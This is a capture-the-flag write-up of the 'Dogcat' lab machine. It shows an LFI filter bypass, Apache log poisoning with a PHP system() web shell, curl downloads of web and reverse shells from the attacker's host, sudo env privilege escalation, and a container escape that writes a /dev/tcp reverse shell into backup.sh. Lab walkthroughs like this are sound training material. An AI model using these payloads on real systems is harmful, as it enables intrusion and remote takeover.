🟠Dogcat
Description:
I made a website where you can look at pictures of dogs and/or cats!
Enumeration
NMAP
nmap -sCSV -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 09:02 EDT
Nmap scan report for 10.10.74.124
Host is up (0.72s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
we have two doors open
80 running apache 2.4.38
and
22 running openssh
website
by clicking on "A dog"

by clicking on "A cat"

By analyzing the url, we can try to see other files besides the conventional ones, for example:

"Sorry, only dogs or cats are allowed."
this message leads us to think that the system checks whether we type "cat or dog" in the url
to bypass, we can use cat/../
that is, we will enter the folder "cats", we will leave and then we will go back to where we were but the url will pass in the verification

Does it work?
this tried to read the index.php but gave some error. but it worked
LFI
Local File Inclusion
we can read .php files from the server
trying to read files with other extensions we have this error:

"passwd.php"
the system adds the .php extension by default
we can try to read the file "index.php", without errors by coding it in base64 using "php Wrapper filter"
view=php://filter/convert.base64-encode/resource=cat/../index

decoding this base64 we can view the index.php source code and understand how it works

here we can see that the system only defines the extension when we do not define "ext".
we can read all files using "ext"
example, reading /etc/passwd
/?view=cat/../../../../../../../../etc/passwd&ext=

RCE
(Remote Code Execution)
in this case, we were able to scale from an LFI to a RCE by reading the log files
to read apache2 log files :
/?view=cat/../../../../../../../../var/log/apache2/access.log&ext=

now if we inject php code into the log, it will be executed, that we get a RCE
to do this I will use a proxy called burpsuite, to intercept the connection and inject code replacing the user agent
writing a shell
<?php echo system($_GET['cmd']); ?>

refreshing and viewing the source code :

it works!
now we can run commands in URL using &cmd=
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls

First flag
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=cat+flag.php

Web Shell
to see what we can use to get a web shell, we can list the machine's binaries
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls+/usr/bin

i will use curl to get a shell from my machine
in our machine:
installing the powny shell
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O powny.php
sudo python3 -m http.server 80
now I will download the file and put it in /var/www/html
in the box machine (RCE)
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=curl <your_ip>/powny.php -o /var/www/html/powny.php

it works
Second flag

Reverse Shell
we will use php-reverse-shell from pentest monkey
so
in our machine:
installing the rev shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
(use nano or vim to change the ip and port)
sudo python3 -m http.server 80

in the web shell :
curl <your_ip>/php-reverse-shell.php -o /var/www/html/shell.php

and now is just enter in:
/shell.php


Privilege Escalation
cd /tmp/
installing linpeas
in our machine:
installing the linpeas
sudo python3 -m http.server 80
in the reverse shell:
curl <your_ip>/linpeas.sh -o /tmp/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > output.txt &
reading the output
cat output.txt
linpeas pointed to this binary (/usr/bin/env) as a 99% chance of being vulnerable to privilege escalation
checking in GTFObins about this binary

sudo env /bin/sh
third flag
Privelege escalation escalation?
as root. in the root (/) of the system we see:

which shows that docker is installed on this machine and we have to do a "Container escape"
so searching for scripts
find / -type f -name *.sh
we find : /opt/backups/backup.sh

this script compresses files from outside the container, so I will replace it with a reverse shell and it will be called from outside the container too
echo '#!/bin/bash' > /opt/backups/backup.sh
echo 'bash -i >& /dev/tcp//1234 0>&1' >> /opt/backups/backup.sh
and just wait
a few minutes later:

Fourth flag

Last updated